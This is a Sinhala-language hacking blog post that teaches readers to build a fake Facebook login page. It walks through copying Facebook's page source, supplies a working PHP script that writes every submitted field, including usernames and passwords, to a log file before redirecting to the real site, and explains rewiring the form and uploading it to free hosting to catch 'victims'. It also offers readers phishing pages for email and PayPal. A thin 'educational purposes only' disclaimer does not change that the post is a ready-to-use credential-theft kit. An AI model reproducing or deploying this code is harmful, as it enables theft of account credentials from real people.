එන්න මාළු බාන්න.. Phishing attacks 1

Phishing කිවුවහම ඉතින් නොයෙකුත් ආකාරයේ Phishing ක්‍රම අද ලෝකයේ බාවිතා වෙනව. මේවයින් හොඳම ක්‍රම කීපයක් ගැන තමයි අපි අද කතා කරන්න යන්නේ.

මුලින්ම මොකද්ද මේ Phishing කියන්නේ කියල බලමු. Phishing කියන්නේ යම් පුද්ගලයෙක්ව යම් කිසි ඇමක් බාවිතා කරල යම් රැවටීමකට භාජනය කිරීමයි. මේ දෙය බොහෝවිට Facebook, email, pay-pall වගේ වෙබ් අඩවි වල Usernames සහ Password ලබා ගැනීමට යොදා ගන්නව. ඉතින් මේකට අපිට මුලින්ම ඔන කරනව අදාල වෙබ් අඩවියේ fake login page එකක්. අපි බලමු කොහොමද ඒ fake login page එක හදාගන්නේ කියල.

Facebook fake login page එකක් සාදා ගන්නා ආකාරය.

මුලින්ම www.facebook.com අඩවියට ඇතුල් වෙලා එහි login page එක පරිඝනකයට බාගත කරගන්න ඕනේ. එක කරන්නේ මෙහෙමයි.

go to facebook.com > right click > view page source



select all > copy



open notpad > paste



file > save as



File name : index.htm
Save as type : All files
Encoding : Unicode



save

දැන් ඔයාල save කරගත්තු file එක open කරොත් ඔයාලට බලාගන්න පුළුවන් සම්පූර්න login page එකක් නිර්මානය වෙලා තියන ආකාරය.

ඊලඟට තවත් file එකක් මේ සඳහා අපි නිර්මානය කර ගන්න ඕනේ ඒ තමයි login.php file එක. ඒ සඳහා මුලින්ම පහත code  එක copy කරගන්න. (code එක select කර ctrl + c ඔබන්න)
 

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
 Notepad එකකට මේ code එක paste කරල login.php කියන නමින් save කරන්න. ආ.. මට අමතක උනා ඔයා අර හදා ගත්තු index.htm file එක right click කරල notepad එකෙන් open කරන්නකෝ. දැන් ctrl + f ඔබල action කියල ගහල පොඩි පයින් පාරක් දෙන්න (find). 
දැන් ඔයාලට ලැබෙයි මේ වගේ line එකක්.

action="https://www.facebook.com/login.php?login_attempt=1"
 ලැබුන් නැත්නම් කොහොම හරි හොයා ගන්න වෙනව ඈ. (තුන් හතර පාරක් find ඔබන්න)

 දැන් මේ රතු පාටින් පෙන්නන කොටස login.php කියල වෙනස් කරන්න.
action="https://www.facebook.com/login.php?login_attempt=1"
මෙන්න මේ විදිහට.
action="login.php"

දැන් save කරන්න. ඔන්න ඔයාගෙ Facebook fake login page එක හදල ඉවරයි.
 මට මේක හදල ඔයාලට Download කරගන්න දෙන්න තිබ්බ නමුත් ඊට වඩා වටිනව ඔයාලම මේක කරල බලල තේරුන් ගන්න එක ඒ හින්දයි step by step fake login page එක හදන හැටි දැම්මෙ
දැන් index.htm file එකයි login.php file එකයි එකම ෆොල්ඩර් එකකට දාල පැත්තකින් තියන්න.

අපි දැන් ඇම හදල ඉවරයි ඊලඟට තියෙන්නේ ඇම දාල මාළුවෙක් අල්ල ගන්න තමා. බලමු කොහොමද මේ ඇම දාන්නේ කියල.
මේකට ලේසිිම ක්‍රමය තමා අපි හදා ගත්තු file 2 hosting  site එකකට upload කරල දාන එක. ඒක කරන්නේ මෙහෙමයි.
මුලින්ම ඔයාලට Hosting space එකක් තියනවනම් තමයි ගොඩක් හොඳ. එහෙම නැත්නම් හොඳ free hosting space දෙන site එකක Register වෙන්න වෙනව. ඒ කරල index.htm එකයි login.php එකයි site එකට upload කරල ඔයාලට පුළුවන් fake page එක view කරන්න.

නමුත් කියන්න ඔනේ මේ hosting  site එකකට upload කරල දාන ක්‍රමය එතරම්ම සාර්තක නෑ ඒ හින්දයි මං මේ ගැන ගොඩක් විස්තර කරන්න යන්නේ නැත්තේ. ඒ මොකද මේ ක්‍රමයට ඔයාලගේ Phishing page එකට victimsල ගන්න අමාරුයි.
සහ මේ ක්‍රමය DNS සමග සම්බන්ද වෙන්නෙත් නෑ.
 ඉතින් කොහොමද මේක හරියට කරන්නේ කියනවනම්. Advance Phishing ක්‍රමයක් විදිහට අපිට පුළුවන් Desktop Phishing කියන ක්‍රමයට යන්න. මෙහිදී සිදුවන්නේ ඔයාල හදාගත්තු Phishing page එක ඔයාලගේ පරිඝනකය හරහාම host කරන එකයි. ඊලඟ post එකෙන් කියල දෙන්නම් කොහොමද මේ Desktop Phishing ක්‍රමයට මේක කරන්නේ කියල.

Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. sinhalahackz.blogspot.com will not be responsible for any damage done by you.

  Phishing page එක හදනකොට ඔයාලට මොකක් හරි ගැටළුවක් ආවොත් Comment එකකින් ඒ ගැන අහන්න සහ ඔයාලට වෙන්ත් email, pay-pall වගේ site වල Phishing page ඕනෙනම් ඉල්ලන්න.

Previous
Next Post »


බැලුවද?

Comment එකකුත් දාගෙනම යමු නේ.....
ConversionConversion EmoticonEmoticon